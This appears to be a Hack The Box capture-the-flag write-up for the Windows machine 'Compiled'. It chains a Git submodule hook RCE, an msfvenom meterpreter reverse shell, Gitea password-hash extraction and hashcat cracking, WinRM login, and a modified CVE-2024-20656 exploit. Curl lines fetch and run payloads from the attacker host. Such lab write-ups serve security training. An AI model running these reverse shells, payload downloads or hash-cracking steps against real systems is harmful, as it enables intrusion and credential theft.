> m4rt@CTF_ARCHIVE:~$

Hack The Box / WINDOWS / 2026-03-27

Hack The Box — Compiled (Windows)

Abuse of insecure Git clone automation through submodule hook RCE for initial access, credential extraction from Gitea DB, WinRM access as emily, and local privilege escalation via CVE-2024-20656 to SYSTEM.

Target

  • IP: 10.10.11.26

Recon

sudo nmap -sC -sV 10.10.11.26 -p- -v -T5

PORT     STATE SERVICE    VERSION
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=177515abfaf0de3f; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=qenIW3fQkFJkgDT1XMewDvE8jOQ6MTcyMjg1MTAwNjY5MzkzODAwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Aug 2024 09:43:26 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=fbcbe26548be890b; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=PTS3uY6wZblo_aYfEjYctFnIeBQ6MTcyMjg1MTAxMzE1MjY0NDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Aug 2024 09:43:33 GMT
|_    Content-Length: 0
5000/tcp open  upnp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Mon, 05 Aug 2024 09:43:27 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub?

Initial analysis

Go to http://10.10.11.26:3000/. It is Gitea. Browse Explore. There are multiple repositories. Download repository Compiled. It is a Python web app.

There is an index endpoint where a POST can submit a Git repository URL. The server appends a line to:

  • C:\Users\Richard\source\repos\repos.txt

Likely another process reads this file, clones repos, then compiles projects.

Proving Git callback

Start listener:

nc -vlnp 80

Go to http://10.10.11.26:5000/ and submit:

  • http://10.10.14.84/test.git

We receive:

GET /test.git/info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.84
User-Agent: git/2.45.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2

Exploitation via malicious Git setup

Relevant vulnerability:

  • https://amalmurali.me/posts/git-rce/

Copy final exploit script. Remove the final git clone call. Run script. Two repositories are created:

  • captain
  • hook

Modify captain/.gitmodules as shown in the blog, for example:

url = http://10.10.11.26:3000/test12/hook.git

Add file and commit. On Gitea, create repositories captain and hook. Push local repositories there.

Start listener:

nc -vlnp 4444

Go to http://10.10.11.26:5000/ and submit:

  • http://10.10.11.26:3000/test12/captain.git

Wait. We receive a reverse shell.

whoami

Richard

Gitea DB extraction

cd '\Program Files\Gitea'

There is gitea.db.

Get Meterpreter shell:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.41 LPORT=4444 -f exe -o reverse.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run

Upload and run reverse.exe on target. Download gitea.db.

sqlite3 gitea.db
select * from users

1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|test12|test12||test12@test.com|0|enabled|e0e24eb28f0736fcb28728474c4b7ddf148a25ed38689eb22435cc7bb9d3f733643db5c3ef3cdab3c6883faced4db0d09030|pbkdf2$50000$50|0|0|0||0|||77aaffcc5f0da7d97efff4bb3b52427a|776d869683337a8969357c4397c12db4|it-IT||1723819262|1723819274|1723819262|0|-1|1|0|0|0|0|1|0||test12@test.com|0|0|0|0|2|0|0|0|0||arc-green|0

PRAGMA table_info(user);

We notice:

7|passwd|TEXT|1||0
8|passwd_hash_algo|TEXT|1|'argon2'|0
17|salt|TEXT|0||0

Convert hash and salt:

perl -e 'print pack ("H*", "97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16")' | base64

l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=

import base64
base64.b64encode(bytes.fromhex('227d873cca89103cd83a976bdac52486'))

In2HPMqJEDzYOpdr2sUkhg==

Final hash format:

sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=

hashcat -a 0 -m 10900 ./hash ./rockyou.txt

sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=:12345678

WinRM and privilege escalation

evil-winrm -i 10.10.11.26 -u 'emily' -p '12345678'

ls 'C:\Program Files (x86)'

We notice Microsoft Visual Studio 2019.

Exploit reference:

  • https://github.com/Wh04m1001/CVE-2024-20656.git

Clone repository and open solution in Visual Studio. Modify line 4 in main.cpp to:

WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";

Modify line 187 to:

CopyFile(L"c:\\temp\\reverse.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);

Build in Release mode. You get Expl.exe.

Start handler in msfconsole.

On target:

cd \
mkdir temp
cd temp
curl http://10.10.14.41/reverse.exe -o reverse.exe
curl http://10.10.14.41/Expl.exe -o Expl.exe
.\Expl.exe

We receive a Meterpreter session as SYSTEM.